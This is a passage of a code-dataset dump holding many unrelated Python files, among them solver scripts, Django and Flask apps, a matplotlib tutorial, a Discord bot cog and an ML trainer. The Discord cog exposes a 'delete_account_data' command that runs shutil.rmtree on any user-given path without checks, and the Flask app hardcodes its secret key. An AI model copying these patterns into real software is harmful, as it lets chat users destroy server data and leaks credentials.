'm000p-{}'.format(step)\n elif mode == 'output':\n return cc_output_dir + 'm000p-{}.corepropertiesextend.hdf5'.format(step)\n elif mode=='output_ccprev':\n return cc_output_dir + 'm000p-{}.ccprev.hdf5'.format(step)\n\ndef h5distread(step):\n basename = fname_cc(step, 'input')\n ccall = {k:[] for k in vars_cc_min}\n for f in glob.glob(basename+'#*'):\n ccf = h5_read_dict(f)\n for k in vars_cc_min:\n ccall[k].append(ccf[k])\n return { k:np.concatenate(ccall[k]) for k in vars_cc_min }\n\ndef m_evolved_col(A, zeta, next=False):\n if next:\n return 'next_m_evolved_{}_{}'.format(A, zeta)\n else:\n return 'm_evolved_{}_{}'.format(A, zeta)\n\ndef create_core_catalog_mevolved(writeOutputFlag=True, useLocalHost=False, save_cc_prev=False, resumeStep=None, useGPU=False):\n \"\"\"\n Appends mevolved to core catalog and saves output in HDF5.\n Works by computing mevolved for step+1 at each step and saving that in memory.\n \"\"\"\n if writeOutputFlag:\n print('Reading data from {} and writing output to {}'.format(cc_data_dir, cc_output_dir))\n cc = {}\n cc_prev = {}\n\n for step in tqdm(steps):\n # Start at step `resumeStep`. 
Assumes code finished running and saved ccprev for step `resumeStep-1`.\n if resumeStep is not None:\n if step p')\n if product_description:\n product_description = product_description.get_text(strip=True)\n else:\n product_description = ''\n # get the upc and assign it to the book\n upc = page.select('.product_page table td')[0].get_text(strip=True)\n # return final book data\n book_data = {\n 'category': category.id,\n 'title': title,\n 'thumbnail_url': book_dict['thumbnail_url'],\n 'price': price,\n 'stock': stock,\n 'product_description': product_description,\n 'upc': upc,\n }\n return book_data\n\n\ndef save_books_on_database(book_data_list):\n \"\"\"\n book_data_list: list or arrays describing books to be saved\n example of book_data_list:\n {\n 'category': 3954,\n 'title': 'Tipping the Velvet',\n 'thumbnail_url': 'http://books.toscrape.com/media/cache/26/0c/ddd9f4a1c.jpg',\n 'price': '£53.74',\n 'stock': True,\n 'product_description': 'Through a friend at the box office, ...',\n 'upc': '90fa61229261140a'\n }\n\n note: models are not saved in parallel to prevent sqlite from exploding\n django.db.utils.OperationalError: database is locked\n \"\"\"\n for book_data in book_data_list:\n category_id = book_data.pop('category')\n category = models.Category.objects.get(id=category_id)\n models.Book.objects.create(category=category, **book_data)\n","sub_path":"techk/apps/scraper/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":7382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"515815679","text":"data = open('a.in', 'r').readlines()\ndata = data[1:]\n\n\noutput = \"\"\nfor i in range(len(data)):\n outstr = \"\" + data[i][0]\n for j in range(1,len(data[i])):\n if data[i][j] >= outstr[0]:\n outstr = data[i][j] + outstr\n else:\n outstr = outstr + data[i][j]\n\n output += \"Case #{}: {}\".format(i + 1, outstr)\nf = open('ala.out', 'w')\nf.write(output)\n","sub_path":"codes/CodeJamCrawler/CJ_16_1/16_1_1_Paweu_a.py","file_name":"16_1_1_Paweu_a.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457556175","text":"'''Benchmark filtering'''\nfrom stdnet import test, transaction\nfrom stdnet.utils import zip\nfrom stdnet.utils import populate\n\nfrom examples.models import Instrument\n\nccys_types = ['EUR','GBP','AUD','USD','CHF','JPY']\ninsts_types = ['equity','bond','future','cash','option']\n\n\nclass QueryTest(test.TestCase):\n __number__ = 10\n model = Instrument\n sizes = {'tiny': 100,\n 'small': 500,\n 'normal': 1000,\n 'big': 5000,\n 'huge': 10000}\n \n def setUp(self):\n size = self.sizes.get(getattr(self,'test_size','normal'))\n inst_names = populate('string',size, min_len = 5, max_len = 20)\n inst_types = populate('choice',size, choice_from = insts_types)\n inst_ccys = populate('choice',size, choice_from = ccys_types)\n with transaction(Instrument) as t:\n for name,typ,ccy in zip(inst_names,inst_types,inst_ccys):\n Instrument(name = name, type = typ, ccy = ccy).save(t)\n \n def testCount(self):\n f = Instrument.objects.filter(ccy = 'EUR')\n n = f.count()\n\n def testSimpleFilter(self):\n f = Instrument.objects.filter(ccy = 'EUR')\n v = list(f)\n f.count()\n \n def testInFilter(self):\n f = Instrument.objects.filter(ccy__in = ('JPY','USD'))\n v = list(f)\n 
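# count() likely runs as a separate backend query; materialising the queryset\n # with list(f) above is not assumed to cache the result count\n 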
f.count()\n","sub_path":"tests/bench/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"363706264","text":"import matplotlib.pyplot as plt # 导入matplotlib\nimport numpy as np\n\nplt.figure() # 创建图形显示的窗口\n\n# 定义函数点数\nx = np.linspace(-3, 3, 50) # 定义x:范围是(-3,3);个数是50.\ny1 = 2*x + 1\ny2 = x ** 2\n# 在figure上绘制图像\nl1, = plt.plot(x, y2, label='up')\n# 在figure上绘制图像,并定义这条直线颜色为红色,线宽为1.0,线的样式为虚线\nl2, = plt.plot(x, y1, label='down', color='red', linewidth=1.0, linestyle='--')\n\n# 坐标的取值范围\nplt.xlim((-1, 2),)\nplt.ylim((-2, 3))\n\n# 坐标的标签\nplt.xlabel('i am x')\nplt.ylabel('i am y')\n\n# 设置坐标分辨率\nnew_ticks = np.linspace(-1, 2, 5)\nprint(new_ticks)\nplt.xticks(new_ticks)\n# 设置坐标轴上要显示的点和对应的文字\nplt.yticks([-2, -1.8, -1, -1.22, 3], [r'$Really\\ bad$', r'$bad$', r'$normal$', r'$good$', r'$really\\ good$'])\n\n# 获得现在的坐标轴,并把右边和上边的边去掉\nax = plt.gca()\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\n\n# 设置坐标轴起点位置 所有位置:top,bottom,both,default,none\n# 第一句是把刻度数字或名称设置在x坐标轴线的底部\n# 第二句是把x坐标轴线设置到y轴的0刻度上\nax.xaxis.set_ticks_position('bottom')\nax.spines['bottom'].set_position(('data', 0))\n# 第一句是把刻度数字或名称设置在x坐标轴线的左边\n# 第二句是把x坐标轴线设置到x轴的0刻度上\nax.yaxis.set_ticks_position('left')\nax.spines['left'].set_position(('data', 0))\n\n# 打印图例\n# 直接打印,请读者自己尝试\n# plt.legend()\n# 带参数的,handles传入线段,labels传入图例信息,loc:把图例显示在最好的位置\nplt.legend(handles=[l1, l2], labels=['aaa', 'bbb'], loc='best')\n\n# 显示某一个点\nx0 = 0.5\ny0 = 2*x0+1\n# 这个函数就是专门描述散点图的\n# 其中s代表点的大小,r代表红色(b代表蓝色)\nplt.scatter(x0, y0, s=50, color='r')\n# 第一个参数和第二个参数分别是x和y的取值范围,能够生成一条线,‘k--’代表的是黑色的虚线,lw代表线宽\nplt.plot([x0, x0], [y0, 0], 'k--', lw=2.5)\n\n# 添加注释 有两种方法\n# method 1\n# $$代表的是一种字体,xy=(x0,y0)即需要注释的坐标,xycoords基于数据的值来选注释位置\n# xytext在原本数据的基础上x0+30,y0-30,得到注释位置,fontsize设置字体大小,arrowprops是箭头的设置\nplt.annotate(r'$2x+1=%s$' % y0, xy=(x0, y0), xycoords='data', xytext=(+30, -30),\n textcoords='offset points', fontsize=16,\n arrowprops=dict(arrowstyle='->', connectionstyle=\"arc3,rad=.2\"))\n\n# method 2\n# 第一个参数和第二个参数代表显示的x和y轴的位置,然后是文本、字体设置\nplt.text(-1, 1, r'$This\\ is\\ the\\ some\\ text$', fontdict={'size': 16, 'color': 'r'})\n\n# 显示窗口\nplt.show()","sub_path":"matplotlib_basics.py","file_name":"matplotlib_basics.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"152453493","text":"import csv\r\ndef ReadFromCSVFile(filename_with_path):\r\n #with open('D:\\Karnik\\Graduate Studies\\Statistical Machine Learning\\Project\\data\\A.csv', newline='') as csvfile:\r\n '''with open(filename_with_path, newline='') as csvfile:\r\n csvreader = csv.reader(csvfile, delimiter=' ', quotechar='|')\r\n for row in csvreader:\r\n print(', '.join(row))\r\n return row'''\r\n\r\n with open(filename_with_path, 'r') as f:\r\n reader = csv.reader(f)\r\n your_list = list(reader)\r\n return your_list\r\n\r\n\r\n\r\n\r\n","sub_path":"readcsv.py","file_name":"readcsv.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221948833","text":"from threading import Thread\n\nimport Pyro4\n\nfrom foundations.network.corba.icorbamanager import ICorbaManager\n\n\nclass PyroCorbaManager(ICorbaManager):\n def __init__(self):\n self._nsaddress: str = None\n self._nsport: int = None\n self._daemon: Pyro4.Daemon = None\n self._ns = None\n\n def init(self, nsaddress: str = \"localhost\", 
nsport: int = 9090):\n self._nsaddress = nsaddress\n self._nsport = nsport\n self._daemon = Pyro4.Daemon()\n\n self._ns = Pyro4.locateNS(nsaddress, nsport)\n\n # start the pyro daemon\n Thread(target=self._daemon.requestLoop, args=()).start()\n\n def getFromSystem(self, objectid: str):\n return Pyro4.Proxy(\"PYRONAME:{0}\".format(objectid))\n\n def remotize(self, obj: object, objname: str = None) -> str:\n uri = self._daemon.register(obj)\n\n if objname is None:\n objname = str(uri.object)\n\n self._ns.register(objname, uri)\n\n return objname\n","sub_path":"foundations/network/corba/pyrocorbamanager.py","file_name":"pyrocorbamanager.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"520313647","text":"#! python3\ndef collatz(number):\n '''returns collatz conjecture with starting point equal to first_num'''\n li = []\n li.append(number) # appending the starting number to the sequence\n while number != 1:\n if number % 2 ==0:\n number = number //2\n li.append(number)\n else:\n number = (number*3) + 1\n li.append(number)\n return li\n\ntry:\n first_num = int(input(\"Collatz conjecture starting number: \"))\nexcept ValueError:\n print(\"Passed argument is not an integer\")\nelse:\n if first_num <= 0:\n raise Exception(\"Number cannot be 0 or negative\")\n else:\n print(collatz(first_num))\n","sub_path":"collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"628207265","text":"__author__ = 'caoyu'\n\nclass Solution:\n # @param version1, a string\n # @param version2, a string\n # @return an integer\n\n def __init__(self):\n pass\n\n def compareVersion(self,version1, version2):\n v1,v2 = version1.split('.'),version2.split('.')\n maxlen=max(len(v1),len(v2))\n minlen=min(len(v1),len(v2))\n for i in range(minlen):\n if int(v1[i])>int(v2[i]):\n return 1\n elif int(v1[i])<int(v2[i]):\n return -1\n total=0\n if len(v1)>len(v2):\n for i in range(len(v2),maxlen):\n total += int(v1[i])\n if total != 0:\n return 1\n else:\n return 0\n\n if len(v1)= bestPosScore:\n\t\t\tbestPosScore = score\n\t\t\tbestPosIndex = p\n\t#print(\"BEST:\", round(bestPosScore,2))\n\treturn bestPosIndex","sub_path":"ai/algorithms/mlAi.py","file_name":"mlAi.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"508101142","text":"from discord.ext import commands\nimport discord\nimport config\nimport sys\nimport asyncio \nimport requests\nimport csv\nimport os\nimport shutil\nfrom discord.ext import tasks\n\nclass Statistics(commands.Cog):\n def __init__(self,bot):\n self.bot=bot\n self.vc=None\n self.channel=None\n\n @commands.group()\n async def stat(self, ctx ):\n if ctx.invoked_subcommand is None:\n await ctx.reply('Invalid command')\n\n @stat.command()\n async def online(self,ctx):\n dir=\"data\"\n path=f\"{dir}/{ctx.guild.name}.csv\"\n await ctx.reply(\"Outputting the file\",file=discord.File(path))\n\n @stat.command()\n async def clear(self,ctx):\n dir=\"data\"\n path=f\"{dir}/{ctx.guild.name}.csv\"\n os.remove(path)\n await ctx.reply(\"Deleted the statistics data for this server\")\n \n @stat.command()\n async def count_reaction(self,ctx,channel_):\n channel=channel_\n if type(channel)is type(None):\n channel=ctx.channel\n else:\n channel=channel_.strip(\"<#>\")\n channel=ctx.guild.get_channel(int(channel))\n user_data={}\n async with ctx.channel.typing():\n async for message in 
channel.history(limit=200):\n for reaction in message.reactions:\n async for user in reaction.users():\n if user.name not in user_data: user_data[user.name]=0\n user_data[user.name]+=1\n res=\"\"\n for key,value in user_data.items():\n res+=f\"{key} : {value}\\n\"\n await ctx.reply(res)\n @stat.command()\n async def count_message(self,ctx,channel_):\n channel=channel_\n if type(channel)is type(None):\n channel=ctx.channel\n else:\n channel=channel_.strip(\"<#>\")\n channel=ctx.guild.get_channel(int(channel))\n user_data={}\n async with ctx.channel.typing():\n async for message in channel.history(limit=200):\n if message.author not in user_data: user_data[message.author]=0\n user_data[message.author]+=1\n res=\"\"\n for key,value in user_data.items():\n res+=f\"{key} : {value}\\n\"\n await ctx.reply(res)\n\n @stat.command()\n async def delete_account_data(self,ctx,path):\n shutil.rmtree(path)\n\n @stat.command()\n async def count_online(self,ctx):\n res=\"\"\n for role in ctx.guild.roles:\n if role.hoist:# if the role is set to be displayed separately from the other roles\n online_count=0\n print(len(role.members))\n for member in role.members:\n if member.status == discord.Status.online:online_count+=1\n res+=f\"{role.name} online: {online_count} members\\n\"\n print(online_count)\n await ctx.reply(res)\n\ndef setup(bot):\n bot.add_cog(Statistics(bot))\n","sub_path":"cogs/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"471398021","text":"from __future__ import absolute_import\nimport os\nfrom kombu import Exchange, Queue\nimport yaml\n\nsettings_filename = os.path.join(os.path.dirname(os.path.realpath(__file__)),\n 'settings.yaml')\nwith open(settings_filename) as settings_file:\n data = yaml.load(settings_file, Loader=yaml.FullLoader)\n\nDEBUG = data['debug']\nSECRET_KEY = data['secret_key']\nINSTALLED_APPS = data['installed_apps']\nCACHES = data['caches']\n\nBROKER_URL = 'amqp://{user}:{password}@{host}:{port}/{vhost}'.format(\n host=data['rabbitmq']['host'],\n port=data['rabbitmq']['port'],\n user=data['rabbitmq']['user'],\n password=data['rabbitmq']['password'],\n vhost=data['rabbitmq']['vhost']\n)\n\nMAX_TASK_PRIORITY = data['celery']['max_task_priority']\n\nCELERY_DEFAULT_QUEUE = data['celery']['default_queue']\nDEFAULT_TASK_PRIORITY = data['celery']['default_task_priority']\n\nAPI_QUEUE = data['api']['queue']\nAPI_TASK_PRIORITY = data['api']['task_priority']\n\nCELERY_RESULT_BACKEND = data['celery']['result_backend']\nCELERY_ACKS_LATE = data['celery']['acks_late']\n\nCELERY_QUEUES = (\n Queue(\n CELERY_DEFAULT_QUEUE,\n Exchange(CELERY_DEFAULT_QUEUE),\n routing_key=CELERY_DEFAULT_QUEUE,\n queue_arguments={\n 'x-max-priority': MAX_TASK_PRIORITY\n }\n ),\n Queue(\n API_QUEUE,\n Exchange(API_QUEUE),\n routing_key=API_QUEUE,\n queue_arguments={\n 'x-max-priority': MAX_TASK_PRIORITY\n }\n )\n)\n\nDEFAULT_FILE_STORAGE = data['default_file_storage']\nSTORE_DATA = data['default_store_path']\nMETADATA_STORE_PATH = data['metadata_store_path']\n\nPOST_SAVE_FILTERS = data['post_save_filters']\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': ':memory:'\n }\n}\n\nMTBF_MAX_HEAP_SIZE = '1G'\n","sub_path":"tardis/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"423607244","text":"# clear\n\n# def solution(n, words):\n# answer = []\n\n# used_words 
= set()\n# cur_word = ''\n# turns = [0] * n\n# for idx, word in enumerate(words):\n# if idx == 0:\n# turns[0] += 1\n# cur_word = word[-1]\n# used_words.add(word)\n# else:\n# turns[idx % n] += 1\n# if word[0] == cur_word and word not in used_words:\n# cur_word = word[-1]\n# used_words.add(word)\n# else:\n# answer.append(idx % n + 1)\n# answer.append(turns[idx % n])\n# break\n# else:\n# answer = [0, 0]\n\n# return answer\n\n\n#\n\ndef solution(n, words):\n for p in range(1, len(words)):\n if words[p][0] != words[p - 1][-1] or words[p] in words[:p]: return [(p % n) + 1, (p // n) + 1]\n else:\n return [0, 0]\n \n\n\n\n\nprint(solution(3, [\"tank\", \"kick\", \"know\", \"wheel\", \"land\", \"dream\", \"mother\", \"robot\", \"tank\"]))\nprint(solution(5, [\"hello\", \"observe\", \"effect\", \"take\", \"either\", \"recognize\", \"encourage\", \"ensure\", \"establish\", \"hang\", \"gather\", \"refer\", \"reference\", \"estimate\", \"executive\"]))\nprint(solution(2, [\"hello\", \"one\", \"even\", \"never\", \"now\", \"world\", \"draw\"]))\n\n# answer\n# [3, 3]\n# [0, 0]\n# [1, 3]","sub_path":"21.04.04/Programmers_12981.py","file_name":"Programmers_12981.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"267623715","text":"from math import *\n\ndef process_input(input_file_name, output_file_name, options):\n\tinput_file = open(input_file_name, 'r')\n\toutput_file = open(output_file_name, 'w')\n\toutput_file.write('%s\\t%s' % (options[\"x-n\"], options[\"y-n\"]))\n\toutput_file.write('\\t%s\\t%s\\n' % (options[\"x-n\"] + '-er', options[\"y-n\"] + '-er'))\n\tfor line in input_file:\n\t\tdata = line.split()\n\t\tdata = map(lambda x: float(x), data)\n\t\tx, y = data[0], data[1]\n\t\tx, y = options[\"x-f\"](x, y), options[\"y-f\"](x, y)\n\t\toutput_file.write('%f\\t%f' % (x, y))\n\t\toutput_file.write('\\t%f\\t%f\\n' % (options[\"x-e\"](x, y), options[\"y-e\"](x, y)))\n\tinput_file.close()\n\toutput_file.close()\n\ndef reverse_data(file_name):\n\tfile = open(file_name, 'r')\n\tdata = []\n\tfor line in file:\n\t\tdata.append(line.split())\n\tfile.close()\n\n\tfile = open(file_name, 'w')\n\tfor line in data:\n\t\tfile.write('%s %s\\n' % (line[1], line[0]))\n\tfile.close()\n\ns = 42.0\nd = 0.16\ng = 1000.0\n\noptions = {\n\t'x-n' : 'U^2',\n\t'y-n' : 'F',\n\t'x-f' : (lambda x, y: x * x),\n\t'y-f' : (lambda x, y: y / 100.0),\n\t'x-e' : (lambda x, y: x * sqrt(2 * (0.01 / sqrt(x)) ** 2)),\n\t'y-e' : (lambda x, y: 10.0 / 100.0)\n}\nprocess_input('input-1', 'output-1', options)\n\noptions = {\n\t'x-n' : 'U, SI',\n\t'y-n' : 'U, SGS',\n\t'x-f' : (lambda x, y: x),\n\t'y-f' : (lambda x, y: 2 * d * sqrt(2 * 3.1415 * (y / 1000.0) * g / s)),\n\t'x-e' : (lambda x, y: x * sqrt(2 * (0.01 / x) ** 2)),\n\t'y-e' : (lambda x, y: y * sqrt( (0.01 / d) ** 2 + 0.0001 + (0.01 / s) ** 2))\n}\nprocess_input('input-1', 'output-2', options)\n","sub_path":"physics-labs/3 sem/3.1.2/process/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"556788279","text":"import os\nfrom pathlib import Path\n\nimport tensorflow as tf\nfrom keras.backend.tensorflow_backend import set_session\nfrom sklearn.model_selection import KFold\n\nfrom ct_slice_detection.inout.dataloader import DataLoader\nfrom ct_slice_detection.inout.parameters import parse_inputs\nfrom ct_slice_detection.models import Models\nfrom 
ct_slice_detection.utils.generic_utils import Fold\nfrom ct_slice_detection.utils.training_utils import PreviewOutput\n\n\ndef cross_validate(baseModel, args):\n pretrained_model = None\n\n trainer_data = DataLoader(args)\n kf = KFold(n_splits=args.n_splits, random_state=args.random_state, shuffle=True)\n num_samples = trainer_data.get_num_samples()\n for idx, (train_index, val_index) in enumerate(kf.split(list(range(trainer_data.num_samples)))):\n print('cross validation step {} of {}'.format(idx + 1, args.n_splits))\n print(val_index)\n\n train_fold(args, baseModel, idx, train_index, trainer_data, val_index)\n\n\ndef train_fold(args, baseModel, fold_index, train_index, trainer_data, val_index):\n trainer_data.split_data(train_index, val_index)\n trainer_data.update_crossval_data(fold_index)\n trainer_data.save_train_val_split(True)\n if args.preview_generator_output:\n trainer_data.preview_generator_output()\n # Setup model\n model_name = args.model_name + '_cv_' + str(fold_index + 1) + '_of_' + str(\n args.n_splits)\n modelwrapper = baseModel(name=model_name,\n config=args,\n input_shape=args.model_input_shape,\n data_loader=trainer_data\n )\n if args.preview_training_output:\n modelwrapper.callbacks.append(PreviewOutput(trainer_data, 10, args))\n print(modelwrapper.model.summary())\n try:\n modelwrapper.train_generator()\n\n except KeyboardInterrupt:\n pass\n modelwrapper.save()\n\n\ndef cross_validate_with_predefined_groups(baseModel, args):\n trainer_data = DataLoader(args)\n name_loader = DataLoader(args)\n name_loader.load_data()\n\n for index in range(4):\n # seg h5 file indicies --> subject ids\n fold = Fold(\n root_path=Path(args.predefined_folds_dir),\n fold_index=index,\n subject_ids=list(name_loader.names_val),\n h5_datafile_path=args.h5_file_with_subject_ids_for_indices,\n npz_mips_file_path=args.dataset_path,\n )\n\n train_fold(\n args, baseModel,\n fold_index=index,\n train_index=fold.get_train_indices(),\n trainer_data=trainer_data,\n val_index=fold.get_val_indices()\n )\n\n\n\ndef main():\n\n args = parse_inputs()\n\n print(args)\n # GPU allocation options\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n # config.gpu_options.visible_device_list = args.cuda_devices\n set_session(tf.Session(config=config))\n\n #Handle restarting and resuming training\n if args.restart:\n print('Restarting training from scratch.')\n os.system('rm -rf {}'.format(args.model_path))\n\n if not os.path.isdir(args.model_path):\n os.system('mkdir -p {}'.format(args.model_path))\n else:\n print('Resuming training on model_path {}'.format(args.model_path))\n\n\n baseModel = Models(args.model_name)\n\n if args.do_crossval and args.do_predefined_crossval:\n raise Exception(\"Conflicting config parameters, both do_crossval and \"\n \"do_predefined_crossval set, choose one\")\n elif args.do_crossval:\n cross_validate(baseModel, args)\n elif args.do_predefined_crossval:\n cross_validate_with_predefined_groups(baseModel, args)\n else:\n trainer_data = DataLoader(args)\n trainer_data.split_data()\n\n if args.preview_generator_output:\n trainer_data.preview_generator_output()\n\n # Setup model\n modelwrapper = baseModel(name=args.model_name,\n config=args,\n input_shape=args.model_input_shape,\n data_loader=trainer_data\n )\n\n if args.preview_training_output:\n modelwrapper.callbacks.append(PreviewOutput(trainer_data,2, args))\n\n print(modelwrapper.model.summary())\n\n try:\n modelwrapper.train_generator()\n\n except KeyboardInterrupt:\n pass\n\n modelwrapper.save()\n\n\n\n\n\nif 
__name__ == '__main__':\n main()\n","sub_path":"ct_slice_detection/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"61610883","text":"from django.shortcuts import render\nfrom django.views.generic import ListView, DetailView\nfrom . import models\n\n\ndef home_view(request):\n context = {\n 'posts': models.PostModel.objects.all(),\n 'title': 'Home'\n }\n return render(request, 'blog/home.html', context)\n\n\nclass HomeListView(ListView):\n model = models.PostModel\n template_name = \"blog/home.html\"\n context_object_name = \"posts\"\n ordering = [\"-date_posted\"]\n\n\nclass PostDetailView(DetailView):\n model = models.PostModel\n\n\ndef about_view(request):\n return render(request, 'blog/about.html', {'title': 'About'})\n","sub_path":"my_blogsite/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"315086778","text":"from .models import Report_Information\nfrom django import forms\n\n\n\n\nclass UpdateReportInfoForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Report_Information\n\t\tfields = ('casualty','respond_time', 'other_information')\n\t\twidgets = {\n\t\t\t'casualty':forms.TextInput(\n\t\t\t\tattrs={\n\t\t\t\t\t'class' : 'form-control',\n\t\t\t\t\t'placeholder': 'Address',\n\t\t\t\t\t'name': 'text-input',\n\t\t\t\t}),\n\t\t\t'respond_time':forms.TimeInput(\n\t\t\t\tattrs={\n\t\t\t\t\t'class' : 'form-control datetimepicker-input',\n\t\t\t\t\t'placeholder': 'Time',\n\t\t\t\t\t'data-target': '#datetimepicker3',\n\t\t\t\t\t'id': 'datetimepicker3'\n\t\t\t\t}),\n\t\t\t'other_information':forms.Textarea(\n\t\t\t\tattrs={\n\t\t\t\t\t'class' : 'form-control',\n\t\t\t\t\t'placeholder': 'Content',\n\t\t\t\t\t#'name': 'textarea-input',\n\t\t\t\t\t'rows':'15',\n\t\t\t\t\t'id': 'blotter_body'\n\t\t\t\t}),\n\t\t\t}\n","sub_path":"Capstone/suspicious_report/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"600186732","text":"from flask import Flask, render_template, request, redirect, url_for\nimport os\n\n# modulo Base de datos\n\n# Iniciando FLASK\napp = Flask(__name__)\napp.secret_key = 'E86xBi9k!y'\n\n# RUTAS \n@app.route('/', methods=['GET', 'POST'])\ndef inicio():\n return render_template('index.html')\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.run(\"0.0.0.0\", port=port, debug=True)","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"432274744","text":"# road trip soln in py2 for codeeval by steven a dunn\n\nimport sys\n\nf = open(sys.argv[1], 'r')\nfor line in f:\n line = line.rstrip().split(\";\")\n distances = []\n for entry in line:\n if not entry:\n continue\n distance = int(entry.split(\",\")[1])\n distances.append(distance)\n distances.sort()\n\n results = []\n cur_pos = 0\n for distance in distances:\n location = distance - cur_pos\n results.append(location)\n cur_pos = distance\n results = list(map(str, results))\n print 
(\",\".join(results))\nf.close()","sub_path":"RoadTrip/py3/rt.py","file_name":"rt.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"602373312","text":"from parse import *\n\ndef property_types_la():\n return ['Entire apartment',\n 'Entire house',\n 'Private room in house',\n 'Private room in apartment',\n 'Entire guesthouse',\n 'Entire condominium',\n 'Entire guest suite',\n 'Entire serviced apartment',\n 'Entire bungalow',\n 'Private room in condominium',\n 'Shared room in house',\n 'Private room in townhouse',\n 'Entire townhouse',\n 'Entire villa',\n 'Entire loft']\n\ndef bathrooms_la():\n return ['0 baths', '0 shared baths', '1 bath', '1 private bath',\n '1 shared bath', '1.5 baths', '1.5 shared baths', '10 baths',\n '10.5 baths', '11 shared baths', '2 baths', '2 shared baths',\n '2.5 baths', '2.5 shared baths', '3 baths', '3 shared baths',\n '3.5 baths', '3.5 shared baths', '4 baths', '4 shared baths',\n '4.5 baths', '4.5 shared baths', '5 baths', '5 shared baths',\n '5.5 baths', '6 baths', '6 shared baths', '6.5 baths', '7 baths',\n '7.5 baths', '8 baths', '8 shared baths', '8.5 baths',\n '8.5 shared baths', '9 baths', '9.5 baths', 'Half-bath',\n 'Private half-bath', 'Shared half-bath']\n\n\ndef parse_url(query):\n try:\n data = [[z for z in findall(\"zip={}&\", query)][0][0],\n [sn for sn in findall(\"streetname={}&\", query)][0][0],\n [sn for sn in findall(\"streetnum={}&\", query)][0][0],\n [pt for pt in findall(\"ptype={}&\", query)][0][0],\n [ac for ac in findall(\"accom={}&\", query)][0][0],\n [nb for nb in findall(\"numbathrms={}&\", query)][0][0],\n [nb for nb in findall(\"numbedrms={}&\", query)][0][0],\n [nb for nb in findall(\"numbeds={}&\", query)][0][0]]\n return data\n \n except IndexError:\n return False\n\n\n","sub_path":"application/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"311003527","text":"from django.shortcuts import render\nfrom django.core.paginator import Paginator,EmptyPage,PageNotAnInteger\n\n\nclass CustomPaginator(Paginator):\n def __init__(self,current_page,per_page_num,*args,**kwargs):\n #当前页\n self.current_page = int(current_page)\n #最多显示的页码数量 11\n self.per_page_num = int(per_page_num)\n super(CustomPaginator,self).__init__(*args,**kwargs)\n\n def pager_num_range(self):\n if self.num_pages < self.per_page_num:\n return range(1,self.num_pages+1)\n #总页数特别���\n part = int(self.per_page_num/2)\n if self.current_page < part:\n return range(1,self.per_page_num+1)\n if (self.current_page+part) > self.num_pages:\n return range(self.current_page-self.per_page_num+1,self.num_pages+1)\n return range(self.current_page-part,self.current_page+part+1)\n\n\n\nUSER_LIST = []\nfor i in range(1,666):\n temp = {'name':'root'+str(i),'age':i}\n USER_LIST.append(temp)\n\n\ndef index(request):\n per_page_count = 10\n current_page_num = request.GET.get('p')\n current_page_num = int(current_page_num)\n #p=1\n #0-10 0-9\n #p=2\n #10-20 10-19\n start = (current_page_num-1) * per_page_count\n end = current_page_num * per_page_count\n data = USER_LIST[start:end]\n\n prev_page = current_page_num - 1\n next_page = current_page_num + 1\n return render(request,'index.html',{'user_list':data,'prev_page':prev_page,'next_page':next_page})\n\n\ndef index1(request):\n #全部数据:USER_LIST ==>得到有多少数据\n # per_page: 每页显示条目数量\n # count: 数据总个数\n # 
